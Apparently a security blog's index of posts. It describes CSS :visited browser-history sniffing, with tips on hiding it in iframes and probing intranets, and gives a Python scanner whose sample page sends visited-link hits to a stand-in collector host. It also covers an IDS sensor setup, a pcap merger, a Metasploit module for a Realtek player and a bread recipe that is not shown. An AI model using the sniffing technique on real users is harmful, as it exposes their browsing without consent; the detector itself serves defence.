The act of “stealing” browser history using various web technologies has been around for a while. You may have seen this version of the attack in slides by Jeremiah Grossman speaking at HITBSecConf 2008 and we followed a PoC and writeup posted by RSnake.
So in short, the gist is this…
- Victim requests a page from Attacker
- Attacker sends a specially crafted HTML page containing links for all the URLs that he would like to check as well as corresponding unique styles.
- The Victim’s browser renders the page, firing off a CSS style for each visited link
- The CSS makes a GET request using background:url(location);
- The attacker handles the GET and uses it to determine the URL that was hit
- The attacker sends back a 404 to keep the browser moving
Easy enough. Now, let’s make it convenient to alter/switch the URL lists. Here’s the code.
Just to be clear, I don’t really consider this “stealing” the history. It’s more like playing a question game, where if you ask the right questions, the client will confirm. That said, we CAN ask a lot of questions.
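The pattern described in the bullet list above (one `:visited` rule per probed link, each pointing `background:url(...)` at a server the page controls) is easy to spot from the defender's side, because ordinary CSS almost never needs a history-dependent network fetch. The following Python scanner is an added example for this post, not code from the original writeup or from RSnake's PoC; the two sample pages, the `collector.example` host and the `min_targets` threshold are constructed for illustration.

```python
"""Scan an HTML page for CSS rules that turn the :visited state into a network request."""
import re
from html.parser import HTMLParser

# A rule whose selector mentions :visited; the body is captured for inspection.
VISITED_RULE = re.compile(r'([^{}]*:visited[^{}]*)\{([^{}]*)\}', re.IGNORECASE)
# The argument of url(...) with optional quotes stripped.
URL_ARG = re.compile(r'url\(\s*[\'"]?([^\'")\s]+)', re.IGNORECASE)


class _PageCollector(HTMLParser):
    """Collects inline <style> text and <a href> targets from the document."""

    def __init__(self):
        super().__init__()
        self._in_style = False
        self.css_chunks = []
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == 'style':
            self._in_style = True
        elif tag == 'a':
            self.hrefs.extend(v for k, v in attrs if k == 'href' and v)

    def handle_endtag(self, tag):
        if tag == 'style':
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            self.css_chunks.append(data)


def find_visited_beacons(css_text):
    """Return (selector, url) pairs for every :visited rule that loads a remote resource."""
    beacons = []
    for selector, body in VISITED_RULE.findall(css_text):
        for url in URL_ARG.findall(body):
            beacons.append((selector.strip(), url))
    return beacons


def assess(html, min_targets=2):
    """Summarise a page; flag it when several :visited rules each fetch a distinct URL,
    which is the signature of per-link history probing rather than ordinary styling."""
    parser = _PageCollector()
    parser.feed(html)
    parser.close()
    beacons = find_visited_beacons('\n'.join(parser.css_chunks))
    targets = {url for _, url in beacons}
    return {
        'links': len(parser.hrefs),
        'beacon_rules': len(beacons),
        'distinct_targets': len(targets),
        'suspicious': len(targets) >= min_targets,
    }


# Constructed sample: the layout the post describes, one beacon per probed URL.
SNIFFER_PAGE = """<html><head><style>
#l1:visited { background: url(http://collector.example/hit?u=1); }
#l2:visited { background: url('http://collector.example/hit?u=2'); }
#l3:visited { background: url("http://collector.example/hit?u=3"); }
a { color: blue; }
</style></head><body>
<a id="l1" href="http://bank.example/">b</a>
<a id="l2" href="http://webmail.example/">w</a>
<a id="l3" href="http://intranet.example/">i</a>
</body></html>"""

# Constructed sample: normal visited-link styling, no fetch keyed to history.
BENIGN_PAGE = """<html><head><style>
a:visited { color: purple; }
a:hover { background: url(/img/underline.png); }
</style></head><body><a href="/about">About</a></body></html>"""

if __name__ == '__main__':
    print(assess(SNIFFER_PAGE))
    print(assess(BENIGN_PAGE))
```

The check only looks at inline `<style>` blocks; in a proxy or crawler you would feed it the fetched external stylesheets as well. Note that modern browsers have since restricted what `:visited` rules may do precisely because of this class of leak, so the scanner is most useful for flagging pages that still try.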
Suggestions:
- Play with iframing it into another page invisibly
- Play with it in Firefox (which seems to rerender the styles as URLs are hit in other tabs)
- Attempt to gain intranet information
Intrusion Detection Systems (IDS) today are, in the opinion of the L0L, fairly poor. Attackers are in a position where they can assume an IDS is in place and still feel comfortable firing away. That said, the skiddies with long “0x90” nopsleds straight off of milw0rm, sloppy recon or generic libraries can be detected. It’s possible that you’re interested in your children’s p2p, porn or chat traffic. All valid reasons for wanting an IDS watching the wire…I guess.
The physical machine itself should have at least one monitor NIC and one management NIC. Our box here has two monitor NICs, as the network TAP we are using does not support aggregation at the unit. If you are running a similar setup you will want to bridge these interfaces or use some sort of traffic merging software to realign both sides of the conversation.
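When a non-aggregating TAP hands each direction to its own NIC, the two captures have to be interleaved by timestamp before any sensor sees a coherent conversation. The following Python script is an added example for this post, not part of the original setup or of any of the tools it mentions: it implements a minimal pcap reader/writer and a k-way merge of one-directional captures. The two sample captures and their stand-in frame bytes are constructed for illustration.

```python
"""Merge two one-directional capture files (one per monitor NIC) into one time-ordered pcap."""
import heapq
import struct

PCAP_MAGIC = 0xa1b2c3d4                 # microsecond-resolution little-endian pcap
GLOBAL_HDR = struct.Struct('<IHHiIII')  # magic, ver_major, ver_minor, thiszone, sigfigs, snaplen, linktype
RECORD_HDR = struct.Struct('<IIII')     # ts_sec, ts_usec, incl_len, orig_len
LINKTYPE_ETHERNET = 1


def build_pcap(records, linktype=LINKTYPE_ETHERNET):
    """Serialise (ts_sec, ts_usec, frame_bytes) tuples into a pcap byte string."""
    out = bytearray(GLOBAL_HDR.pack(PCAP_MAGIC, 2, 4, 0, 0, 65535, linktype))
    for sec, usec, frame in records:
        out += RECORD_HDR.pack(sec, usec, len(frame), len(frame)) + frame
    return bytes(out)


def read_pcap(blob):
    """Parse a pcap byte string; returns (linktype, [(ts_sec, ts_usec, frame_bytes), ...])."""
    magic, _, _, _, _, _, linktype = GLOBAL_HDR.unpack_from(blob, 0)
    if magic != PCAP_MAGIC:
        raise ValueError('unsupported pcap magic 0x%08x' % magic)
    offset = GLOBAL_HDR.size
    records = []
    while offset < len(blob):
        sec, usec, incl_len, _ = RECORD_HDR.unpack_from(blob, offset)
        offset += RECORD_HDR.size
        frame = blob[offset:offset + incl_len]
        if len(frame) != incl_len:
            raise ValueError('truncated record at offset %d' % offset)
        offset += incl_len
        records.append((sec, usec, frame))
    return linktype, records


def merge_pcaps(*blobs):
    """Interleave several captures by timestamp.

    Each input is already in its own NIC's arrival order, so a k-way heap merge on
    (ts_sec, ts_usec) restores the full conversation without a global sort."""
    parsed = [read_pcap(b) for b in blobs]
    linktypes = {lt for lt, _ in parsed}
    if len(linktypes) != 1:
        raise ValueError('captures use different link types: %r' % sorted(linktypes))
    merged = heapq.merge(*(recs for _, recs in parsed), key=lambda r: (r[0], r[1]))
    return build_pcap(list(merged), linktype=linktypes.pop())


# Constructed sample: each TAP leg sees one direction of a handshake; frames are stand-in bytes.
CLIENT_TO_SERVER = build_pcap([(1000, 100, b'C>S SYN'),
                               (1000, 300, b'C>S ACK'),
                               (1000, 400, b'C>S GET')])
SERVER_TO_CLIENT = build_pcap([(1000, 200, b'S>C SYN/ACK'),
                               (1000, 500, b'S>C 200 OK')])


def merged_order():
    """Frame payloads of the merged capture, in the order a single-NIC capture would have seen them."""
    _, records = read_pcap(merge_pcaps(CLIENT_TO_SERVER, SERVER_TO_CLIENT))
    return [frame.decode() for _, _, frame in records]


if __name__ == '__main__':
    print(merged_order())
```

The same job is done by `mergecap` from the Wireshark suite on real files; the point of writing it out is to see that correct interleaving depends entirely on the two NICs sharing a clock, so an offset between them will reorder a handshake and confuse any stream reassembly downstream.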
Recently I had seen a TED talk on baking bread. The speaker expressed in great detail his love for bread and somewhere in the mix he mentioned the idea of using spent grain from brewing as an ingredient. I was taken in by the idea.
Malted grains that are used in the brewing process have been specifically modified. From the germination and halting of growth at early stages, to the roasting and drying processes afterward, much energy is poured into processing these grains for the purpose of making beer. To me it seemed like an incredible waste to just dump the stuff in the garbage.
Here’s the current recipe for Spent Grain Bread:
There is now a File Format metasploit module posted for the Realtek Playlist exploit. This exploit already existed in the framework and was implemented as a remote connect module by MC, which I might add is much cooler than the one here. That said, if you ever need to drop and pop on one of the 5 people using the Realtek player, here you go.
Check it out in the CODE section
The guys over at the French security firm JA-PSI have opened a coding contest up where the goal is to crank out Metasploit modules. They’ve established a reasonable scoring system and prizes for the winner. The prize is 150 Euros (approx $203 USD) and a ticket to FRHACK.
Check out the contest @ https://www.securinfos.info/metasploit/msfxdc.php
The contest runs through February 1st, 2009 so start ripping off sploits!